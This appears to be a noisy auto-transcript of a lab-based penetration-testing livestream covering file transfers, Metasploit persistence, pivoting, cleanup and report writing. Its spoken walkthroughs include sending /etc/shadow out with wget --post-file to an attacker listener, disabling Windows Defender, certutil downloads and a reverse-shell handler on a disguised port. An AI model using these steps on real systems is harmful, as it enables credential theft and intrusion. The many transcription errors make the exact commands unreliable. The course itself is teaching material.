Zero to Hero: Week 11 - File Transfers, Pivoting, and Reporting Writing

Key Takeaways

what is up Shalom Shalom there's always a delay when I come through it's also recording delay too so I never know when to start talking you would think after 11 weeks we'd figured this out but it hasn't happened what's up everybody who's in here quite a bit of you bats in here what's up Matt what's up sticking the mine it's up Richie reckless pancake keV runs on Dunkin flood sex in here yo lots of familiar faces happy to see you guys I don't even know how to pronounce what you just said flood sick on this shoulder this is the the Cheshire Cat this arms basically well it is all Alice in Wonderland yeah it does look like tentacles and it kind of kind of is how do I expect somebody to hire me I guess I don't I'm I'm unemployable guys what's up solo what's up deadly alright we're gonna get started here let's go ahead and actually just get started my dogs are going crazy so that's awesome I forget what buttons there we go welcome welcome unless you want to see my pretty face we can do could do that there you go that's not too bad welcome to the last episode of zero to hero we are week 11 you've made it to the end so we're gonna do some quick housekeeping we're gonna talk file transfers we're gonna cover some cool little tricks that I like file transfer wise maintaining access pivoting and cleanup we are gonna do a lab on pivoting we're gonna talk maintaining access and talk cleanup and I'll get into that and the reasonings why then we're gonna cover legal we're gonna cover report writing and finally we're gonna end on career advice so we'll talk some legal documentation I'll cover that example report that I put out if you haven't seen it now's the time to talk about it and then I'll give you my career advice tips etc tip my hat and sign off so we'll do QA ama at the end let's just go right into the housekeeping so like I said this is the last stream immediately after this stream I will be breaking some protocol and I will be uploading the stream on to YouTube there's 24 hour waiting period I'm just gonna Yolo out I'm also going to be putting it on the zero to hero pen testing on the cyber mentor com so if you're looking for that repository it's on there as well the course will be full and we'll be done tonight 30 minute AMA two reasons why I am on three and a half hours sleep I want a party so bad with you guys but I'm a flight at six o'clock in the morning as of just a few minutes ago I got a text message thing that they may have cancelled the flight so that's great because we've had this book forever my wife's handling that right now the flight doesn't say that is cancel online but the text message said it was so she's on the phone dealing with Southwest Airlines right now so as of right now potentially leaving at 6:00 in the morning so I'm drinking my monster on three and a half sleep you guys ask me all the time how do I get all the work done because I never sleep so don't don't be like me definitely try to get some sleep so because of that we're gonna push the drinking game into next week next week we'll just have a super super chill chat what we'll do is we'll drink we'll hack things we'll have fun I'll try to pick a different topic that we haven't covered before something a little different and we'll just have some fun with it so other than that a favor to ask of you guys if you guys are enjoying the course if you enjoyed your journey please do consider leaving me some feedback you could leave it for me on discord on LinkedIn on Twitter I would greatly appreciate that many of you already have and that's awesome full disclosure I am planning and to do this course again in a paid version which is just gonna include some more updated material it's gonna have an actual lab built out to where we can bpn into it so you guys got the free edition free edition covers pretty much everything I wanted to cover the labs just gonna be a little bit more upgraded and I would love to use some testimonials if you guys don't mind that so that's my only ask of you guys other than that tell a friend say hey you know I I enjoyed this course you guys should check it on YouTube or whatever that would be great so other than that let's go ahead and just dive into our lesson so I've actually put that in the wrong spot we're gonna talk about transfers first then we'll talk maintaining so if you are looking to take the course the course will have discount for students first responders and military vets military active doesn't matter you just got to let me know ahead of time and we can work it out it's gonna be a 20% discount if that's if you guys want to retake this course but anyways so let's go ahead and talk file transfers so tonight we're gonna do file transfers with Linux typically Linux file transfers include W get so we're gonna look at W get and then we're gonna look at some windows tools we're gonna look at HTTP FTP Metasploit cert util stick in the minds already getting ahead of me with tools my disclaimer here is that these are not all-inclusive there are many more many more tools that you're gonna be able to use for file transfers these are some of my favorite ones there's power shell there's SFTP there's all kinds of cool little tricks that you're gonna learn along the way I'm just going to show you some of the basic ones so and hopefully you learn a couple of cool little tricks especially with what we're about to see and in our file transfer labs so without further ado I'm gonna open up my VM here and we're gonna start with Linux so with Linux file transfers we've already covered double you get right we can go pull down a file off the web if we want to you know we could actually pull a file I believe from ourselves so we could host up a file let's try that and so all I'm doing right now is I am hosting I've got a folder called files and we just say LS I've got a file called secrets in there literally nothing in there but something that says secrets and what we can do is we could host a Python server now remember I covered Python servers back during Python lessons but in case you forgot Python - em here and we are going to do a simple HTTP server and you can just type in 84 port 80 let that run so anything that's in this location here the secret stop text is going to be out on the interwebs and so all you would do is go into your interwebs and you can go to your own IP address I'm sitting at 202 dot 128 I believe today so we got the secret stop text here right and if we come over here in theory we should be able to W get our own file we get to say HTTP double slash slash - OH - 128 slash secrets dot text now you can see that we grab secret side text and I put it as a dot 1 because it already exists in the folder and then if you come over to here you see that it actually shows that we grabbed it so somebody came in here and made some sort of grab so we know that W get works now there are some additional cool tricks that we can do with W get and one thing that people don't know is that you can actually push out files from W get so let's cancel this HTTP server here and let's do instead let's set up a netcat listener so we're just gonna say netcat NB LP let's just put it on port 8081 ok so now imagine this scenario you are on a machine that you have exploited you set up a listener here and what you can do with dub you get is there's actually this module in there if you say - - post file like that and then let's just say we want to get rid of this secrets right secrets dot txt and we want to we want to send it out actually let's do something better this is more practical let's say we want to send out the FC password with the FC shadow file right you can do this and then you just type in the IP address one two eight and then you type in the port number at the end of it says awaiting response but if you come over here look what just came through so it comes through like it is a with the web header right and then I've got the whole file that just came through here so this is a quick way to dump files off to yourself that I feel like a lot of people don't know about it's pretty neat so that's a neat little way to transfer files back and forth using double you get with Linux so let's talk about Windows while we are at it so you just saw I talked about hgp you just saw me spin up a file server here so python - mmm somebody asked the MS fours for module so we've got the - M and we're just listening on port 80 for any traffic now if we were on a RDP machine then we would just come in right we'd say oh I'll just go down to the web server that's easy we've gotten GUI access right and we'll just download the file and if we click on it you'll see that traffic comes through and somebody made a get request to that secret subtext it just says secrets so that's a common way a really common way if you've got access GUI access to a machine but the rest of the ways I'm going to show you are for if you don't have GUI access to a machine and let me actually make this fullscreen here so you guys can see so I'm willing to power on my Windows 10 machines and I've got this lab set up for pivoting so let me see which one is which okay so for for you guys you can log in either one but I'm gonna be logging into Frank castles machine so this was the first machine that we set up and again from Frank castles machine anybody on anybody on the network and go to that location see I've already got it up but secret tags secret X dot ones in here another thing that we can do while we've got this running so imagine the scenario you don't have GUI access but you do have access via shell there is a wonderful tool now I will note that this tool has been getting blocked lately by Windows Defender and I have actually gone in and turned Windows Defender off in in group policy so if you want to do that as well on your machines like some people were saying that the machines were where we're turning Windows Defender back on after a reboot and that is pretty accurate you can go into your GP edit on your local machine and just go in here and then there's actually a setting if we go into let me cheat and look at my notes so if we go into the administrative templates and then I believe it's windows components and then there should be a Windows Defender antivirus right here so there's this little policy it says turn off Windows Defender antivirus if you double click on that and you say enable there should be not configured by default if you say enable this will turn off the policy or this policy will turn it off you just hit ok then you reboot and you are good to go so if you want to do that for all your machines you're more than welcome if not you may have to turn off Windows Defender again tonight for some of the activities that we're gonna be doing anyway so there is a tool that I like to use if you go into command prompt this simulates what a shell would be like what we're gonna do is we are going to use a tool called cert util this is fairly common and I don't feel like a lot of people know about it so we say apparently I'm not typing in here we say cert util and it's built in to - almost all of Windows like for a long time now I couldn't tell you where but this is kind of the equivalent of a double you get so you say - you are all cash the - f-for a file and then you just grab the file you want so it's exec - OH - one two eight slash secrets dot txt pull it down you say derp and oh I messed up you got a name your file so we'll just call it secrets txt like this and then it says completely successfully let the dirt and then you see the secrets of txt is here we could type it make sure it actually came over correctly and you see it says secrets so that's a neat little way there's some more advanced methodology behind this too there's actually a way to split the files and then rejoin the files to kind of bypass some antivirus I've never actually had it work but I've read blogs on it where it shows it working so there's some some little tricks on that on the more advanced side but just know that cert util especially if you're doing things like capture the flag or you know hack the box even osep stuff this is a neat little trick that you can use to bring files over so on top of that there is one more trick that I would like to show you and that is FTP and let me make sure that is the only trick I want to show you I don't have all my notes up let's see where's my PowerPoint HTTP FTP I am Metasploit of course Metasploit so we can also spin up a FTP server now if we come back into here and we kill this now with Python we can spin up a quick FTP server module as well it's called PI FTP you just type it out and hit tab and then you do a - P for port and 21 like this start running it now some of you might be trying to run this and it's not working the reason that would be is because you didn't install it if you've been following from week one I had you install this either week one or two one of the early weeks I believe you can just do a pip install of Pi of TPD Lib and that should get you where you need to be but either way just like the port 80 webserver we just spun up this is the port 21 FTP server that we're spinning up we can come on to our Windows shell and we can say FTP and then type in the address you want to go to it's gonna say ok you've connected what's your password using a password just type in anonymous anonymous preferably wearing your Guy Fawkes mask right and then you are here so you could say der and again same thing it's gonna put it what all the files it's gonna share are right in the folder that you spin it up in so again we have the secret text you could type in I think it's help to find all the things that you can do but you can put files in here with put so you can transfer files out and you can also get the files from this folder as well so you would just say get secrets text so it's fairly straightforward one of the easier ways to transfer files as well ok so let's go ahead and exploit our machine again we've got this Windows 10 machine here remember we have a PS exec exploit for it so I'm gonna exploit the machine and we're gonna just kill this and I've got some questions coming through is there any reason why you shouldn't do it in bash service das TPD start because that turns it on permanently this is just an easy on off right so you've got your service up and then you got your service off it's the same thing with the web server like the web servers running and then that's not running right the other way is you start up your your web server with like I've say Apache then you have to go put it in your folder like you have to go put it in your WWE folder to share it out here you can just share the folder what you got right away you don't have to go put things and items and locations you want it's just an easy spin up so it's it's instant and that's this is why a lot of people have moved to Python for for spinning up these quick servers okay so let's get into let's get into Metasploit if I'm going too fast guys let me know I'm just trying to get through everything tonight and I saw some people came in hey Jeff how's it going hey Dan nice to see you man okay so we are gonna exploit our Frank Castle machine one more time so we're gonna say use exploit Windows SMB PS exec should be familiar from all the previous lessons we say options okay we're gonna set our our hosts my our host for this machine I think is 134 I don't want to be wrong here okay it's 202 dot 134 we're gonna set the SMB domain as Marvell set SMB pass as password one set SMB user as F Castle and let's set the target as to remember it's got the automatic target and sometimes it works sometimes it doesn't see if this even works denied that's okay we'll try again try again try again okay we've got our shell so one of the nice little features about Metasploit is it's got a lot of stuff they can do we've been doing pretty much all of our work in Metasploit it is so robust and so awesome I'm the biggest fan skitty whatever you want to call me when it comes to Metasploit I'm I'm all about it so if you come in here and you say there is an upload in a download I might go buy it I don't know I'm not good at seeing things just just trust me okay there it is upload and download you pretty much have full control anyway here so you could say like I think it's like present working directory okay we're in system 32 we can change the directory to see users and that we saved PWD like that note that I put in the second slash therefore character escaping so we're in the users folder if we say der okay there's a couple users so what I want to do is I want to I want to upload this secrets file into this folder so we're just going to say upload secrets and you could do this you know you could do this with any file it doesn't have to be in the director you're in you could say root when we put it file secret text something like that and then if you want to put it in this folder you would just say secret sub text or you could say let's just put it in the C Drive right something like that you just gotta Claire where you're putting the folder or the file and then it says it uploaded it to the C Drive let's go check out our C Drive and there it is secrets so same concept right we can download that file to our maybe maybe not oh because I didn't declare dot txt I'm getting all fancy here there you go so we can also download the file and Metasploit one of the fastest ways if you got it meterpreter shell you might as well just use this to transfer your files instead of doing it through a shell yourself one of my absolute favorite ways so while we are in Metasploit let's talk our next PowerPoint section so put this in the wrong order so let's go back and we're going to talk about maintaining access with meterpreter so we've got a few different things I want to talk about we've got these are all in meterpreter like I said we've got persistent scripts we've got scheduled tasks we've got met SVC now I'm not going to be showing you any of these tonight these are these are likely really not gonna come up in a junior level pen test I don't honestly I don't see persistence much like for example the run persistence this - eh is just a - help and I can show you that like we could talk about it let's go back this is just like a really it's like a really dangerous thing to run and you say - page like this and so you have to declare all these values right but what it does is okay what options do I want do I want to do I want to automatically start an agent when it boots as a service do I want to start an agent when the user logs in do I want to start an agent when the system boots what's the IP of the system that we're gonna reach back to what's our IP our attacker IP do I want to set a port right now if you go and read the Metasploit documentation you read Metasploit Unleashed it tells you that this is a very very dangerous module to run that really as a a penetration tester you don't need to be running this unless you you absolutely need to and the main reason is it just opens up a port on a machine that port doesn't have any credentials you just basically connect back to it right so you're just leaving it wide open for a future attack and you actually have to go back in and delete the service it does input it into the registry you have to remove it from the registry this will give you an RC file if you're connected to go in and actually delete all those files for you so it does have some cleanup but but tools like this are dangerous and there's not a lot of need for them when it comes to when it comes to I would say junior or mid to your level pentesting if you're doing red teaming or something where you're being very very discrete and you need a computer you're on a host and you don't want to lose access to that host that's a completely different situation but when you're in a time limited engagement chances are you're not going to ever need this so I'm only going to show you the high levels for this we're not gonna go too deep into it because it's just going to be deeper than we need to go so let's go back to the PowerPoint so we can do it through persistent scripts there's a few here exploit windows local persistence is pretty close if not the same thing to this persistence that's aged it just allows you to upload malware there's actually some if you do a show advanced it allows you to use your own executables instead there's a registry persistence as well there are scheduled tasks persistence so that way you can schedule a task basically to run the same time every day that runs your your executable so that way you gain a shell at least at some point right and you would just sit there with a listener and we haven't actually covered the listeners we haven't actually covered those and I can show you what I mean by this listener so you could have like a netcat listener but if you're trying to gain a meterpreter shell back let's just background this session that we've got so we can use something called exploit multi handler and if we say options on this so it doesn't really show you what it does oops I moved my screen I'm sorry guys and it cannot go back there we go don't know if you saw that but sorry I click the wrong thing so it really doesn't show you what it does here but what we can do is we actually set a payload so we'll say okay the payload I'm gonna be sending through this exploit is going to be a Windows meterpreter able to say reverse TCP hey thanks Matt I appreciate that and then you say options again and now you'll see that it gave you this reverse TCP you might set the L port to something sneaky you might say set L for it to 443 so the traffic goes out on a known port and then you would set your L host right whatever your IP address so our our L host is 192 168 202 dot 1 to 8 and then you would just say run now you can run this with a set of switches that'll put it in the background and just listen but just just to get an example all you're doing is running a handler this is very similar to netcat where you're listening we're listening right now on 4 for 3 for any traffic to come in to this IP address and if it matches this payload it'll talk back it'll start up a meterpreter shell and that's how these persistence scripts run with with malware so other than that I encourage you to look into these if you want to play around with these build your own lab just note again that you're gonna scrub the machines when you're done because these do leave open ports so make sure they're BMS or you are closing the registries and open ports when you are done so going back in you can also look into met SVC it's similar to the rest another persistence module this is not all of them there are actually a lot of persistence modules in meterpreter but these are the generic ideas you want access to come back to you if you lose it if a machine like you have a laptop you access and they take it offline so they go home when they go back you want it to connect and talk back to you so that's the thought process so what's up next not clean up we're gonna go talk about pivoting so let's talk about building ok so we are gonna do a pivoting lab together we're gonna build this out I've already got mine built out so I will try to be as patient as I can be and what we'll do is we will come into here and let's go into workstation up here and I want you guys to go to edit virtual network editor pivot yeah I wanted to I wanted to use that in this in this talk I guess but I was afraid that I was gonna get sued by friends or something along those lines do I send the slides on discord I don't ever send the slides out I could I don't actually think I have a slide saved if I'm being honest with you I've been running the same PowerPoint just deleting it but you're more than welcome to take screenshots or whatever you like so this is kind of hard to see and I don't understand why what is going on okay so you there we go so you should see this something like this right and you might just have a 1 in an 8 here I need you guys to go into change settings and that's an admin protocol it's gonna bring this back over again ok so you've got your auto bridging VM at 0 you've also got a 1 & 8 go ahead and just hit add network and I set it to be mm7 so look at my settings and I'll go slow as I can at this go ahead and select host only on these settings and then at the bottom we're gonna give it a completely different subnet we're gonna say 1010 10.0 with a subnet mask of a wack 24 so all 255 0 at the end and then you should have your typical 192 168 down here with NAT running 202 zeros while I'm on whatever you guys are on however you've been connecting you want to use this guy here so we're gonna hit OK now we're gonna have to do something some editing here's the situation here's the scenario let's set that up first we are on a 192 Network and we are attacking a network we've plugged into the network or gained access so we're attacking a network that is this 192 and we've gained access to a machine and we're going to gain access to a machine when we gain access to this machine we realized through our enumeration our post exploitation enumeration that it is a dual homed machine meaning that it's running on two different networks so we see ok it's running on a 192 Network and it's running on a ten dot network so we have until this time not been able to access that 10 network we can only see the 192 Network so what I've done is I've set this up where our Frank Castle machine if we come into Frank Castle he is running a dual home machine and let me blow this up again you go to the IP config you could see he's got a 192 address and a 10.10 address now we've also got a Peter Parker machine I'm gonna power back on and I'm just gonna log in as the administrator here two times the hot action that sounds sounds about right all right we say command ipconfig 10.10 10.1 twenty-nine so these two machines they can talk right but with this machine we won't be able to talk we say ping okay well it shouldn't be able to talk it's talking through it's talking through Metasploit I got ahead of myself sorry or it's just talking I don't know what's going on it hates me okay no idea why they're talking should not be talking guys so if we if we go in here this is all on its own network right and the domain controller is also on two networks let's take a look if I can get out of this screen now it's not letting me I am so frozen right now guys I don't even know what to do let's see can I come back alright there we go okay so if we come into here and we say command you can see that we're running on 192 and we're also running to attend 10.10 dot one twenty-eight now let's talk about the lab setup and you guys in theory it should not talk for you I've been doing a lot of pivoting in the last couple days so maybe there's something that got set up some routing table that got configured I did do an auto out with my meterpreter and it may have set a routing table for me so I'm not sure the reason anyway let's set this up you're gonna have to shut down all of these so what we're gonna do is we're gonna shut down all the machines and I'm just gonna leave mine on and running but go ahead and shut yours down or your machine that we just exploited the Frank Castle machine what you're gonna do is you're gonna go into you're gonna actually all pause it so I could show you in your shutdown state we're gonna edit the network's and I'll pause all these so I can show you okay so if we edit the virtual machine settings I won't be able to do this because I am I am still powered on technically just because I'm on pause I have one network adapter on Frank Castle that is running NAT I've got another network adapter that is running VM net seven remember that's the second NIC right so Frank Castle is gonna have to nix and then we come over to Peter Parker Peter Parker is gonna have one NIC and he's going to be sitting on the 10 network and lastly we are going to come over to the domain controller and we are gonna say I've got to be m-28 it's the same thing as NAT be I'm gonna 8:00 p.m. at 7:00 so two separate NICs so go ahead and configure those I'm going to resume these real quick and maybe troubleshoot why these machines can talk can this reach the other way cannot so another thing to note once you guys get everything powered back on is if we come into the network adapter for Peter Parker I'm just going to go into network status and then change adapter options okay we'll go let's see Network and sharing Center since it wants to be rude we'll do that way we have to this has changed the only reason I'm changing this so I've got the preferred DNS for one nine to 168 200 to 150 and then alternate DNS of 10 10 10 dot 128 those should line up with here 200 to 150 and then 128 just so it's talking and if it fails over it's still talking it's not connected to the internet because it's not connected to anything available to be connected to the Internet second the line it doesn't have to be connected to the Internet for this lab to work what's important is that we can pain from our Windows 10 is that we can ping the other machine it's a 1:29 what I'm troubleshooting sick of the mind is why my Kali machine that is sitting on a 192 Network is able to talk out to a 10 network that they shouldn't know what it is this should not be happening right and earlier it wasn't happening so I'm guessing that I had some sort of route that it learned and it can't talk back the other way but it can definitely talk forward so I'm not gonna worry about it I'm not gonna worry about it the lab the lab will hold up for its purpose guys all right how are we doing on the resets if you're following along have you reset everything are you back up and running I know this is a little bit procedure I just didn't want to have to show all of it classic demo problems absolutely all right we're going to run the service networking restart that we're saying still pinging it's fine guys I'm not gonna be too worried about it so let's continue on so we'll pretend happily that we are unable to talk to that machine what we have is access right to a machine Ian meterpreter so let's actually it's background let's go to sessions we have no active sessions we lost it never mind so let's get our session back so let's go to use exploit Windows SMB PS exec option just to make sure we're all the same let's try running it okay now we can try some pivoting commands we can first look I'm actually curious let's look at the routing table if we've already got some sort of auto route no routes have been added yet so hey thanks Grayson I appreciate that so we've got no Auto routes but what we can do here is we can say run Auto route and then do a dash S and then we want to connect to that ten Network right so we're gonna say slash 24 okay now if we run the command again you'll see we have a route in there through session two so if we go actually I want to show you if we go into a shell real quick so some things to note right so if I am a attacker an attacker I want to see if a machines dual homed a couple things we can do is you can say route print and we can look at the routing table right in the routing table shows us that there's a 10 network and there's a 192 Network so that would be an indicator you could also look at the ARP - a-and see the art table and you can see that there's a 10 network in here and there's a 192 network as well a net stat might show us some things if there's any communication between the the two if they're if they're talking over something you can see a 10 here and a 192 here as well we can see where it's established you know some connections talking out here on 4 4 3 so sometimes in lab settings they've got a machine talking to another machine for some purpose or another so if you see a connection here over one port to another you might see that you might see that in the real world as well but just things to look out for this is how you'll be able to identify the machine is dual home outside of the IP config right but you just want to notice these things so control see now we've got our auto route going now in theory we should be able to communicate with that machine that we weren't able to communicate with wink wink right so we can do some things we could say use auxilary actually a better background this we could say use auxiliary scanner port scan and then we could do a TCP scan right and if we say options okay so we can set the our hosts to 10 10 10 dot 129 and then we get to set the ports right it's gonna scan one through 10,000 scanning on a pivot is incredibly slow so just for a proof-of-concept what I'm going to do is we're just gonna we know that SMB is open because we open folders on this in the past so we're just gonna say set ports 1 39 and then we're just gonna run this okay and you see that it says port 139 is open on that machine right so we're going through the machine that we exploited and we're scanning against it now I wasn't able to get this to work but I will try for some on-screen magic and see if we need it to work we could try using the exploit again say that we dumped hashes or we knew credentials or something right and we've got local hashes and we want to pass the hash around to this new network we could try to use the exploit again with s Mbps exec and see if they work if we go options we know that the the our host is 10 10 10 dot 1 29 and I'm going to change the out port to all fives now the Marvel is still the same but let's change the SMB user to administrator just for proof-of-concept set the SME pass to what we've been using let's hit run I heard a ding in the background chances are it blocked it with defender would be my guest okay yeah I'm not going to worry too much about it we can view the details it sounded like it it locked it that's typically what happens but just know as a proof of concept that you can run these exploits through one machine to another this is the idea of pivoting and yeah so if you see a dual home machine you might people to transition off of one network into another Network leverage that access and navigate around would you often exploit users with Windows Defender disabled on pen tests you would be surprised a lot of places aren't using Windows Defender Windows Defender is really just stepped up its game as what's going on but doesn't mean that places are patching and allowing their Windows machines to update for these they might be using other antivirus that doesn't pick up on this you might use a few skated malware and concepts to try to log in instead that's why bps exec has got the PowerShell it's got you know it's got different options you might try to to do different things to get around it so good question though all right and that's really it for the pivoting section let's talk really quick about clean up so again we're going to just talk clean up we're not going to actually demonstrate and now this clean up that I'm providing is in regards to pen testing the other clean up that you hear about in the hacking methodologies is more about you know removing your tracks completely you know like eliminating logs any sort of system events proof that you were there at all right this type of cleanup here is is more geared towards pen testing this is what this is an actual you know a realistic network pen test course so just a few notes and the source is down here from where I stole all these from but you're gonna want to remove any executable scripts or temporary files from a compromised system if possible use secure delete method for removing the files right you want to get rid of all the malware you put on a system you don't want to leave that you want to return all the original values for the application parameters if you modified them you want to remove any backdoors like you saw with the persistence any of those any user accounts you created a lot of times you'll create an account to access a machine or to plant a flag or whatever any of these accounts you want to delete them when you're done so you want to leave it like you found it right you don't want anything in there that is malicious or could lead to a breach or something a weakness for the the client at a later time so you need to make sure that you're you're cleaning up your mess is essentially the the whole point behind this so that's that's all my speech for cleanup and that's really it let me bring you guys back I'm gonna grab a drink of my monster and we are on decent timing actually okay so next slide we're gonna get into the legal and the documentation so we're gonna talk really quick about the sales some of the before you test and the after your tests we're gonna go through the through a sample report and talk about that as well so in the sales process when you first meet your client or you sit down you want to talk to your client and most of these you're probably never gonna deal with maybe as a manager level you might deal with some of these but you're gonna have a mutual non-disclosure agreement meaning that you're not going to give out the client information the clients not going to give out your information that you don't want them to give out so whether that's pricing structure or your sales methodology or any documentation you give them it's all under NDA and whatever they tell you about their network you can't go tell somebody else about that right on top of that you're likely to have some sort of master service agreement now I linked one for rapid7 all you really have to do is just type in master service agreement pentesting and all of these the big names will come up with their own master service agreement they're all public knowledge out there it's basically just a contractual document so it just says like these are the performance objectives and you know what the the responsibilities are both parties there's just all legal mumbo-jumbo but it's the the agreement you signed before doing work on top of that there is a statement of work which is your what activities you're going to do what deliverables are you're going to provide what timeline you gonna provide them on right so like I'm gonna do a web application assessment I'm gonna deliver you a report when it's done and I will get you that in two weeks time and that's your statement of work you're likely gonna have costs on there what the costs are gonna be and what the payment terms are gonna be as well so and sometimes you'll see that the statement of work it's also sometimes the rules of engagement as well on some places I see slip them out some places they're both the same thing once the statement of work is signed this rules of engagement signed so but before you test regardless you need that statement of work slash rules of engagement to to go write it because your rules of engagement also has your scope details like you can't attack this specific machine or you can't use social engineering or you can't perform denial of service or you can't use a certain tool right like you need to know what you can and can't do what machines you can and can't attack that's very critical that you stay in scope because if you go out of scope you can get in pretty big trouble so I said cya cover your ass this is a cover-your-ass document right other process in the sales you're gonna probably have a sample report that you give to a client you probably want to have recommendation letters etc so any of these things that you can give to a client or potential client and say hey here's more about me the process whatever this all helps in the sales side of thing so after you are all said and done you do your testing you have a report to deliver now I have released this report on github I'm also gonna show it to you here there's a video on YouTube it's all over the place so if you want to see this again and you don't like this presentation then you can go watch it elsewhere download it play with it do whatever so this is your yours to use yours to modify years to do with whatever you want just make it your own you know so this is just a standard idea I'm actually gonna make this a full screen so standard idea of how I would organize this when I actually give this to clients I'm gonna have a little bit more details in here so this is gonna be bare-bones for you guys but it's it's gonna be the same pretty same or closed structure when I actually give this to clients as a sample report so you see here I've got the header says demo company security assessment findings report its business confidential it's got today's date on it it's got a project number version number again business confidential of blah blah blah you've got a fancy table of contents okay and then at the top you've got a confidentiality statement it just says that this is between demo company and TCM security and it contains confidential information basically you're not going to duplicate redistribute this in any part form without the consent of both parties so on top of that it says you can share this document if we need to actually this says TCMS this should probably say DC can share this document with auditors under non-disclosure agreements demonstrate penetration test requirement compliance so sometimes you have audits and compliance requirements so it's not saying that you can't share it but as long as the other people are under non-disclosure that's fine here is a disclaimer the big thing that you want to note to potential or to clients is that a penetration test is considered a snapshot in time the day after you finish your test and exploit can come out a miss configuration can occur something can happen that causes a vulnerability right and you want to make sure that they're aware of that you also want to make sure that they're aware that this was a time limited engagement if you're only given a week chances are you're not going to find every single thing on an assessment especially if the assessments full of vulnerabilities so what we say is we prioritize them to point out the weakest controls and then we gave them full report information for further details on top of that you always want to include contact information so who are the important contacts from the company or pentesting who are your important contacts here okay you're gonna give an assessment overview you're gonna say hey we were engaged from these dates to these dates and we evaluated the security posture based on best practice and that included this is just an external penetration test of this one but if you had more components and you would list those in there all testing is performed on the nist SP 800 guideline also we do tests on the olaf's testing guideline and customized testing frameworks these phases of penetration tests come from the nist SP 800 so there's planning discovery attack reporting you just talk about what that is I may have a tiny little infographic here that shows you know you do planning you do discovery you do attack you report on what you attack but then if you also get in you do some additional discovery repeat the process and report so with that you also want to include the assessment components that you perform right so you're performing an external penetration test so this just gives you a high-level overview of what a external penetration test is it says we're going to use a employee information historical breach information we're gonna perform scanning enumeration to identify potential vulnerability and hopes of exploitation so if you had an internal you would know what that is you would note web app you know social engineering whatever the engagement you would have a list of all your components so coming through here now we've got a finding severity rating this just says what the ratings might be from critical to informational what the CVS sd3 score is comparatively for those and what the definition is like a critical is exploitation super easy it led to like system of a compromised RCE some sort you need to plan an action right now and patch immediately we're a low is like yeah it doesn't lead to an exploit but you know best practice states that you should probably patch it in the next maintenance window but you know not a big deal if you don't so we have this findings chart just so you know the customer is aware what what each finding means and then going through that this page is it's a little lackluster I want to add some more to this but you always want to include the scope and there would be a you know there'd be more information here for every assessment component you did so if there was an external and internal web app you would give all the details of what you tested now I know these are internal IP addresses I'm wasn't gonna put external IP addresses out there because somebody probably owns those but you would just say hey I tested this range and this range whatever and then full scope information is provided in a additional full findings excel document that's where you list out all the findings that you found with notes on them and then you would say like if you had 50 IPS you were testing against you might not list them all here you might just say I'm testing against 50 IP addresses other than that you want to have the scope exclusions right so we didn't perform any denial service attacks during testing on top of that we have client allowances right so did they provide us a pass did they provide us you know any sort of things that allowed us any kind of help on this testing you want to notate that so on top of that scroll down now you want to do an executive summary and you want to do a technical summary right so the executive summary is for your sea level the sea level just likes to see things I'd like to see pretty pictures they don't really care about the muddy details right so you want to give them everything up front that you can give them so a quick blurb here it says we did the testing from this date to this date by leveraging a series of tacks we found critical vulnerabilities and we were able to gain full internal network access to the headquarter office and then we gave an attack summary of how we were able to gain internal access and some of the recommended remediations so from here like we obtained historical breach account credentials to leverage against the company login pages so a recommendation there is to discourage your employees from using work emails and usernames as login credentials to other services unless necessary all the way down to we leverage valid credentials to log in to the VPN well they permitted VPN access right oh ah did and the VPN did without multi-factor authentication so we recommend that they use authentication on all services so on all external basing services so here you would provide some strengths and weaknesses so an example of a strengths is ok well there sim was alerting on vulnerability scans as soon as we started scanning they alerted us that they saw as they verified our IP address and they had the opportunity to blacklist us from further action you would probably want to provide here at least three to five good strengths that they had and you would want to provide you know if they had weaknesses three to five weaknesses and probably fill out two pages with this so the more information that you can provide the better again this is just a bare bones report so here is the ulnar abilities by impact basically this is a chart that says critical high low moderate whatever how many of our abilities did we find by each impact there's only one finding on this report and it was a critical finding so there's only one critical you probably put a little bit of blurb down here about why the finding is critical what whatever you know you could add and make this your own so on top of that you come down here now and you have the external penetration test findings right so you've got the insufficient lockout policy so what it says is the company allowed us unlimited login attempts against their Outlook Web App Services this configuration allowed force and password guessing attacks in which we were able to gain access to their internal network the impact is critical because we did gain access we note the system that we gained access on and then we provide the references of the pages for this so obviously remote access and then unsuccessful login attempts automatic account lockout both the nist SP 800 policies and then you provide a proof of concept so first things first we gather historical breach data found in cadential dumps the data amounted to 868 total count credentials now obviously we can't put all those on one page would take up many pages so we're Justin say hey we'll throw them in the full findings that way you can review all the account credentials here you've got the usernames and passwords and then it's just a sample list of breach user credentials and then we're just going to go through the whole process we took those credentials performed a credential stuffing attack blah blah blah we weren't able to gain access with credential stuffing but outlook was providing enumeration through a username enumeration so got fail login but username is valid so using that we gathered valid user names and performed a password spraying attack we use Summer 2018 exclamation point a username return is successful you see successful login here and then we would say we let two valid credentials to gain access to the VPN there would be a picture here BPM access from there you would want to make a remediation recommendation so I like to put who what the vector is and then what the actions gonna be so who's gonna be the IT team if this was a web app you would say developer or if this was maybe more network side you would say network engineer and then you'd say you know the vector was done remotely so it's